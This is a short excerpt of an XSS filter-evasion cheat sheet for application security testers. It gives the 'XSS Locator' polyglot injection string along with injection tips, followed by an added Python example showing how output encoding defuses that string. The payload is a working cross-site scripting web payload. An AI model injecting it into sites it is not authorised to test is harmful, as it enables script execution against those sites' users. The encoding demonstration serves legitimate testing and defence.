XSS Filter Evasion Cheat Sheet
DRAFT CHEAT SHEET - WORK IN PROGRESS
Introduction
This article is focused on providing application security testing professionals with a guide to assist in Cross-Site Scripting (XSS) testing.
Tests
XSS Locator
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up (String.fromCharCode(88,83,83) evaluates to "XSS", so the alert confirms script execution without relying on quote characters a filter might strip). Use a URL encoding calculator to encode the entire string before injecting it. Tip: if you're in a rush and need to quickly check a page, often injecting the deprecated "<PLAINTEXT>" tag will be enough to check whether something is vulnerable to XSS, since it messes up the output appreciably:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
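The following added example is not part of the cheat sheet; it shows why the locator works and how context-aware output encoding defuses it. The same string is rendered into an HTML attribute and a JavaScript string literal once raw and once encoded, and two checks a tester can run against their own application's output report whether the breakout succeeded. The function names (render_unsafe, render_safe, count_script_tags, recovered_input_value) are my own, not from the page.

```python
import html
import json
import re
from html.parser import HTMLParser

# The XSS Locator string exactly as given on the page (raw string, so the backslashes survive).
XSS_LOCATOR = r"""';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"""


def render_unsafe(value: str) -> str:
    """Vulnerable: user input dropped raw into an attribute and a JS string literal."""
    return f'<input value="{value}">\n<script>var q = \'{value}\';</script>'


def render_safe(value: str) -> str:
    """Hardened: entity-encode for the attribute, JSON-encode for the script.
    '<' is additionally escaped so the JS string can never contain '</script>'."""
    attr = html.escape(value, quote=True)            # & < > " ' become entities
    js = json.dumps(value).replace("<", "\\u003c")   # quotes and backslashes escaped
    return f'<input value="{attr}">\n<script>var q = {js};</script>'


def count_script_tags(rendered: str) -> tuple:
    """(opening, closing) script tags in the output; the template alone contributes (1, 1)."""
    opens = len(re.findall(r"<script", rendered, re.IGNORECASE))
    closes = len(re.findall(r"</script", rendered, re.IGNORECASE))
    return opens, closes


class _InputValue(HTMLParser):
    """Collects the value= of the first <input>, entity-decoded as a browser would decode it."""

    def __init__(self):
        super().__init__()
        self.value = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.value is None:
            self.value = dict(attrs).get("value")


def recovered_input_value(rendered: str):
    """What the DOM would hold for value=; equals the original input only if encoding was correct.
    Returns None when the injected quote mangles the tag so badly no <input> is recognised."""
    p = _InputValue()
    p.feed(rendered)
    return p.value
```

With the raw render the locator adds two script elements and breaks the attribute; with the encoded render the page keeps exactly its own one script element and the attribute round-trips to the original string, so the data is preserved but inert.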
References
Authors and Primary Editors
RSnake